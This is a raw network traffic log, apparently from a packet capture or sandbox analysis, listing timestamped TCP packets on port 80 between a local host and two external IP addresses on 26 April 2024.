Apr 26, 2024 10:27:05.366076946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366132021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366169930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366180897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366208076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366215944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366245985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366283894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366322041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366328001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366358995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366365910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366398096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366435051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366472006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366478920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366509914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366513968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366548061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366585016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366621971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366628885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366661072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366667032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366698027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366734982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366770983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366782904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366808891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366816998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366847038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366883993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366921902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366930008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366960049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366966009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366997004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367033958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367070913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367082119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367110968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367115021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367150068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367187023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367223978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367230892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367261887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367264032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367299080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367335081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367372990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367383957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367410898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367417097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367448092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367485046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367522001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367532015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367558956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367595911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367607117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367640018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367651939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367677927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367716074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367753983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367769003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367790937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367801905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367827892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367865086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367902994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367913008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367942095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.367950916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.367979050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368016005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368052006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368063927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.368088961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368098974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.368144989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368181944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368217945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368231058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.368257999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368273020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.368297100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368334055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368371010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368385077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.368408918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368422985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.368447065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368483067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368520021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368556976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368592978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368632078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.368724108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.369282961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.369354010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.369410992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.408126116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.408171892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.408194065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.408282042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.408327103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.408370972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418430090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418469906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418498993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418507099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418521881 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418543100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418555975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418582916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418593884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418621063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418631077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418662071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418675900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418713093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418721914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418751001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418762922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418797970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418804884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418842077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418848991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418879986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418896914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418917894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418927908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418955088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.418963909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419002056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.418992043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419045925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419056892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419081926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419090033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419118881 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419127941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419158936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419167995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419204950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419212103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419244051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419250965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419281006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419301987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419317961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419326067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419363022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419426918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419464111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.419473886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.419508934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420167923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420206070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420243025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420243025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420267105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420280933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420289040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420319080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420325994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420356989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420370102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420394897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420399904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420432091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420439005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420469046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420475960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420509100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420516014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420545101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420555115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420583010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420591116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420620918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420624018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420658112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420660973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420701981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420702934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420738935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420744896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420777082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420778036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420814991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420816898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420852900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420854092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420902967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420906067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420943975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.420944929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420981884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.420988083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421019077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421022892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421056032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421065092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421092033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421094894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421128035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421133995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421165943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421176910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421201944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421205997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421241045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421243906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421277046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421278954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421314001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421317101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421351910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421356916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421389103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421391964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421427011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421432972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421463966 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421469927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421504974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421631098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421668053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421674967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421705961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421709061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421744108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421746969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421782970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421876907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421916008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.421919107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.421958923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422015905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422059059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422085047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422122002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422126055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422159910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422163963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422197104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422199965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422234058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422244072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422271013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422276020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422307968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422310114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422347069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422348022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422385931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422385931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422421932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422425985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422463894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422708035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422744989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422749996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422784090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422785997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422822952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422827959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422862053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422863007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422899961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422904015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422938108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422940969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.422975063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.422979116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423012018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423015118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423048973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423053026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423085928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423088074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423127890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423129082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423166037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423166990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423202991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423207045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423239946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423243046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423276901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423279047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423314095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423316002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423352003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423356056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423388958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423391104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423425913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423429012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423463106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423465014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423500061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423501015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423538923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423542023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423576117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423578978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423613071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423615932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423650026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423652887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423686028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423690081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423722982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423726082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423760891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423772097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423793077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423799038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423836946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423841000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423872948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423875093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423911095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423913002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423948050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423955917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.423985004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.423986912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424022913 CEST	80	49733	185.172.128.76	192.168.2.4
